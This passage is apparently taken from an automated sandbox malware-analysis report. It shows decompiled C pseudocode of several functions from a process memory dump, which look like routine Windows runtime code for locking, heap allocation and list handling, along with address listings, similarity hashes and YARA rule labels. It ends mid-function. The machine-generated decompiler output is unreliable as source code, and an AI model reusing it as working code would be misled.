										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000172c
											_t95 =  *((intOrPtr*)( *_t37));
											E044A4888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E0443EB70(_t95, 0x45179a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E044695D0();
											L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E044695D0();
											L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0443EB70(_t93, 0x45179a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E044695D0();
										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E044695D0();
										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000172c
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x172cd002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0445F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























            0x044252a5
            0x044252ad
            0x044252b0
            0x044252b3
            0x044252b7
            0x044252ba
            0x044252bf
            0x044252c4
            0x044252cc
            0x00000000
            0x00000000
            0x044252ce
            0x044252d1
            0x044252d9
            0x044252dd
            0x044252e7
            0x044252f7
            0x044252f9
            0x044252fd
            0x04480dcf
            0x04480dd5
            0x04480dd6
            0x04480dd7
            0x04480dd8
            0x04480dd9
            0x04480dde
            0x04480ddf
            0x04480de0
            0x04480de1
            0x04480de2
            0x04480de2
            0x04480de5
            0x04480dea
            0x04480dec
            0x04480f60
            0x04480f64
            0x04480f70
            0x04480f76
            0x04480f79
            0x04480f79
            0x00000000
            0x04480f64
            0x04480df2
            0x04480df7
            0x04480e04
            0x04480e04
            0x04480e0d
            0x04480e0d
            0x04480e10
            0x04480e1a
            0x04480e1c
            0x04480e4c
            0x04480e52
            0x04480e61
            0x04480e67
            0x04480e6b
            0x04480e70
            0x04480e76
            0x04480ed7
            0x04480edc
            0x04480ee0
            0x04480ee6
            0x04480eea
            0x04480eed
            0x04480ef0
            0x04480ef3
            0x04480ef6
            0x04480ef9
            0x04480efb
            0x04480efe
            0x04480f01
            0x04480f01
            0x04480f0b
            0x04480f12
            0x04480f16
            0x04480f18
            0x04480f18
            0x04480f1b
            0x04480f2c
            0x04480f31
            0x04480f31
            0x04480f35
            0x04480f39
            0x04480f3a
            0x04480f3c
            0x04480f3c
            0x04480f3f
            0x04480f50
            0x04480f55
            0x04480f55
            0x04480f59
            0x044252eb
            0x044252f1
            0x044252f1
            0x04480e7d
            0x04480e84
            0x04480e88
            0x04480e8a
            0x04480e8a
            0x04480e8d
            0x04480e9e
            0x04480ea3
            0x04480ea3
            0x04480ea7
            0x04480eaf
            0x04480eb3
            0x04480eb9
            0x04480eb9
            0x04480ebc
            0x04480ecd
            0x04480ecd
            0x00000000
            0x04480eb3
            0x04480e1e
            0x04480e21
            0x04480e25
            0x04480e2b
            0x04480e2f
            0x04480e30
            0x04480e3a
            0x04480e3f
            0x04480e41
            0x00000000
            0x00000000
            0x04480e47
            0x00000000
            0x04480e47
            0x04480df9
            0x04480dfe
            0x00000000
            0x00000000
            0x00000000
            0x04480dfe
            0x04425303
            0x04425307
            0x00000000
            0x04425309
            0x00000000
            0x04425309
            0x04425307
            0x044252e9
            0x044252e9
            0x00000000
            0x044252e9
            0x0442530e
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a8f93b05f1ad81be4f599962f994da37aaaad88ba376759bd79d4659037636af
            • Instruction ID: 9fe105c7352bcc214dab742602720187af38e0b5d780065a6c0fdfd7463f3c01
            • Opcode Fuzzy Hash: a8f93b05f1ad81be4f599962f994da37aaaad88ba376759bd79d4659037636af
            • Instruction Fuzzy Hash: 6B51DF71205741ABEB21EF29C940B2BBBE4FF44714F14491FE49587662E774F809CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0443EF40, Relevance: .1, Instructions: 147COMMON
            Download Yara Rule
            C-Code - Quality: 96%
            			E0443EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04429080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x775ec21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04422D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























            0x0443ef4b
            0x0443ef4d
            0x0443ef57
            0x0443f0bd
            0x0443f0c2
            0x0443f0d2
            0x0443f0d2
            0x0443f0c2
            0x0443ef5d
            0x0443ef5f
            0x0443ef67
            0x0443ef6a
            0x0443ef6d
            0x0443ef74
            0x0443ef7f
            0x0443ef82
            0x0443ef82
            0x0443ef86
            0x0443ef88
            0x0443ef8c
            0x0443ef8f
            0x0443ef8f
            0x0443ef8f
            0x00000000
            0x0443ef91
            0x0443ef93
            0x0443efc4
            0x0443efc4
            0x0443efc4
            0x0443efca
            0x0443efd0
            0x0443f0a6
            0x00000000
            0x00000000
            0x0443f0af
            0x0448bb06
            0x0448bb0a
            0x0443f0b5
            0x0443f0b5
            0x0443f0b5
            0x0443f0b5
            0x00000000
            0x0443efd6
            0x0443efd9
            0x0443f0de
            0x0443f0e2
            0x0443efdf
            0x0443efdf
            0x0443efdf
            0x0443efe5
            0x0448bafc
            0x0448bafc
            0x0443efe5
            0x0443efeb
            0x0443efed
            0x0443f00f
            0x0443f011
            0x0443f01a
            0x0443f01d
            0x0443f021
            0x0443f028
            0x0443f029
            0x0443f029
            0x0443f02c
            0x00000000
            0x0443f02c
            0x0443eff3
            0x0443eff9
            0x0443f0ea
            0x0443f0ed
            0x0443f0ef
            0x00000000
            0x0443f0ef
            0x0443f003
            0x0448bb12
            0x0443f045
            0x0443f049
            0x0443f051
            0x0443f09e
            0x0443f0a0
            0x0443f0a0
            0x0443f09e
            0x0443f053
            0x0443f064
            0x0443f064
            0x0443f06b
            0x0448bb1a
            0x0448bb1a
            0x0443f071
            0x0443f071
            0x0443f07d
            0x0443f082
            0x0443f08f
            0x0443f08f
            0x0443f009
            0x0443f00d
            0x00000000
            0x0443f00d
            0x0443efd0
            0x0443ef97
            0x0443efa5
            0x0443efaa
            0x00000000
            0x0443efac
            0x0443efac
            0x0443efac
            0x00000000
            0x0443efb2
            0x0443f036
            0x0443f03a
            0x0443f040
            0x0443f090
            0x00000000
            0x0443f092
            0x0443f042
            0x00000000
            0x0443f042
            0x0443efb7
            0x0443efb9
            0x0443efbc
            0x0443efb0
            0x0443efb0
            0x00000000
            0x0443efbe
            0x0443efbe
            0x0443efc1
            0x00000000
            0x0443efc1
            0x0443efbc
            0x0443efaa
            0x0443ef91

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
            • Instruction ID: 306c0ef72e05c5a76d65c2f563ff11bfabb1828bcec3e858b966c28655cb759b
            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
            • Instruction Fuzzy Hash: 53510430E05249EFDF20CF68C1807AFBBB1AF49715F2881AAE54557381D3B5B98AD741
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F740D, Relevance: .1, Instructions: 141COMMON
            Download Yara Rule
            C-Code - Quality: 84%
            			E044F740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0447D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0446F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0446F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















            0x044f740d
            0x044f740d
            0x044f7412
            0x044f7413
            0x044f7416
            0x044f7418
            0x044f741c
            0x044f741f
            0x044f7422
            0x044f7422
            0x044f7428
            0x044f742a
            0x044f742a
            0x044f7451
            0x044f7432
            0x044f744f
            0x044f744f
            0x00000000
            0x044f7434
            0x044f7438
            0x044f7443
            0x044f7517
            0x044f7517
            0x044f751a
            0x044f7535
            0x044f7520
            0x044f7527
            0x044f752c
            0x044f7531
            0x044f7533
            0x00000000
            0x044f7533
            0x00000000
            0x044f7531
            0x044f754b
            0x044f754f
            0x044f755c
            0x044f755c
            0x044f755f
            0x044f7560
            0x044f7561
            0x044f7562
            0x044f7563
            0x044f7568
            0x044f756a
            0x044f756c
            0x044f756d
            0x044f756d
            0x044f756f
            0x044f7572
            0x044f7574
            0x044f7577
            0x044f757c
            0x044f757f
            0x00000000
            0x044f7551
            0x044f7551
            0x044f7551
            0x044f7553
            0x044f7553
            0x044f7449
            0x044f7449
            0x044f744c
            0x044f744c
            0x00000000
            0x044f744c
            0x044f7443
            0x044f750e
            0x044f7514
            0x044f7514
            0x044f7455
            0x044f7469
            0x044f746d
            0x00000000
            0x044f7473
            0x044f7473
            0x044f7476
            0x044f7480
            0x044f7484
            0x044f748e
            0x044f7493
            0x044f7493
            0x044f7496
            0x044f7499
            0x044f74a1
            0x044f74b1
            0x044f74b5
            0x00000000
            0x044f74bb
            0x044f74c1
            0x044f74c1
            0x044f74c4
            0x044f74c5
            0x044f74c6
            0x044f74c7
            0x044f74c8
            0x044f74cd
            0x00000000
            0x044f74d3
            0x044f74d3
            0x044f74d6
            0x044f74d8
            0x044f74db
            0x044f74dd
            0x044f74e0
            0x044f74e7
            0x044f74ee
            0x044f74ee
            0x044f74f4
            0x044f74f9
            0x00000000
            0x044f74fb
            0x044f74fb
            0x044f74fd
            0x044f7500
            0x044f7503
            0x044f7505
            0x044f7505
            0x044f74f9
            0x00000000
            0x044f74cd
            0x044f74b5
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
            • Instruction ID: b8e3bf0f7cc6aee3bd0ea5233b4b6caf97aa4528b2845b7cb247636ef5564811
            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
            • Instruction Fuzzy Hash: 43518B71600606EFDF25CF54D880A96BBB5FF45308F14C0AAEA089F252E775F986CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04454D3B, Relevance: .1, Instructions: 131COMMON
            Download Yara Rule
            C-Code - Quality: 78%
            			E04454D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x451d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0446FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4517bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0446B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04444620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0442CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0446B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0446F380(_t67 + 0xc, 0x4405138, 0x10) == 0) {
								 *0x45160d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04454F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04454E70(0x45186b0, 0x4455690, 0, 0) != 0) {
					_t46 = E0442CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















            0x04454d3b
            0x04454d4d
            0x04454d53
            0x04454d58
            0x04454d65
            0x04454d6c
            0x04454d71
            0x04454d77
            0x04454d7f
            0x04454d8c
            0x04454d8e
            0x04454dad
            0x04454db0
            0x04454db7
            0x04454db8
            0x04454db9
            0x04454dba
            0x04454dbb
            0x04454dc1
            0x04454dc8
            0x04454dcc
            0x04454dd5
            0x04454dde
            0x04454ddf
            0x04454de0
            0x04454de1
            0x04454de6
            0x04454de7
            0x04454de9
            0x04454df3
            0x00000000
            0x00000000
            0x04496c7c
            0x04496c8a
            0x04496c8a
            0x04496c9d
            0x04496ca7
            0x04496cac
            0x04496cb2
            0x04496cb9
            0x00000000
            0x04496cbf
            0x04496cbf
            0x00000000
            0x04496cbf
            0x04496cb9
            0x04454dfb
            0x04496ccf
            0x04496cd3
            0x04454e32
            0x04454e39
            0x04496ce0
            0x04496cf2
            0x04496cf2
            0x04496ce0
            0x04454e3f
            0x04454e41
            0x04454e51
            0x04454e51
            0x04454e03
            0x04454e03
            0x04454e09
            0x04454e0f
            0x04454e57
            0x00000000
            0x00000000
            0x04454e1b
            0x04454e30
            0x04454e5b
            0x04454e5b
            0x00000000
            0x04454e30
            0x04454e11
            0x04454e11
            0x04454e16
            0x00000000
            0x04454e16
            0x04454e01
            0x00000000
            0x04454e01
            0x04454da5
            0x04496c6b
            0x00000000
            0x04454dab
            0x04454dab
            0x00000000
            0x04454dab

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4829cae3e08543dc9e7270db5501e4e5f39aca143ac7048991e6c58c63c03cb3
            • Instruction ID: 5922af74f158c28682c015b886d845b8824e1438e4932ffa4c8b5f87cc0ca5d1
            • Opcode Fuzzy Hash: 4829cae3e08543dc9e7270db5501e4e5f39aca143ac7048991e6c58c63c03cb3
            • Instruction Fuzzy Hash: 5D419F71A40318AFFF31DF158D80BABB7A9EB45714F00409BED499B292D774BD84CA91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04463D43, Relevance: .1, Instructions: 106COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E04463D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04437B60(0, _t61, 0x44011c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04437B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04444620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















            0x04463d4c
            0x04463d50
            0x04463d55
            0x04463d5e
            0x0449e79a
            0x00000000
            0x0449e79a
            0x04463d68
            0x0449e789
            0x04463d9d
            0x04463da3
            0x04463daf
            0x04463db5
            0x04463dbc
            0x04463dc4
            0x04463dc9
            0x04463dce
            0x0449e7ae
            0x0449e7ae
            0x04463dde
            0x04463de2
            0x04463de7
            0x04463e0d
            0x04463e13
            0x04463e16
            0x04463e1e
            0x04463e25
            0x04463e28
            0x00000000
            0x00000000
            0x04463e2a
            0x04463e2f
            0x04463e37
            0x04463e37
            0x00000000
            0x04463e37
            0x04463e31
            0x00000000
            0x04463e31
            0x04463e20
            0x04463e20
            0x04463e35
            0x00000000
            0x04463de9
            0x04463de9
            0x04463de9
            0x04463dee
            0x04463dfd
            0x04463dff
            0x04463e02
            0x04463e05
            0x04463e05
            0x00000000
            0x04463df0
            0x04463de7
            0x0449e78f
            0x0449e794
            0x04463d79
            0x04463d84
            0x04463d89
            0x04463d8e
            0x00000000
            0x0449e7a4
            0x04463d96
            0x04463d9a
            0x00000000
            0x04463d9a
            0x00000000
            0x0449e794
            0x04463d6e
            0x04463d73
            0x00000000
            0x0449e7b5
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 873787eb706ce1744a2f2b0ba0a57e3d18c7ba2d4154f48189660a0bfe00db1a
            • Instruction ID: fbd1d024cebb536e237f30edc8f57466896f9ca20a629eec010a5c47b2431fca
            • Opcode Fuzzy Hash: 873787eb706ce1744a2f2b0ba0a57e3d18c7ba2d4154f48189660a0bfe00db1a
            • Instruction Fuzzy Hash: AE316D31A056959BEF34CF29C841A6BBBE5EF55700B15806FE84ACB390E730E841D7A2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044A7016, Relevance: .1, Instructions: 104COMMON
            Download Yara Rule
            C-Code - Quality: 76%
            			E044A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
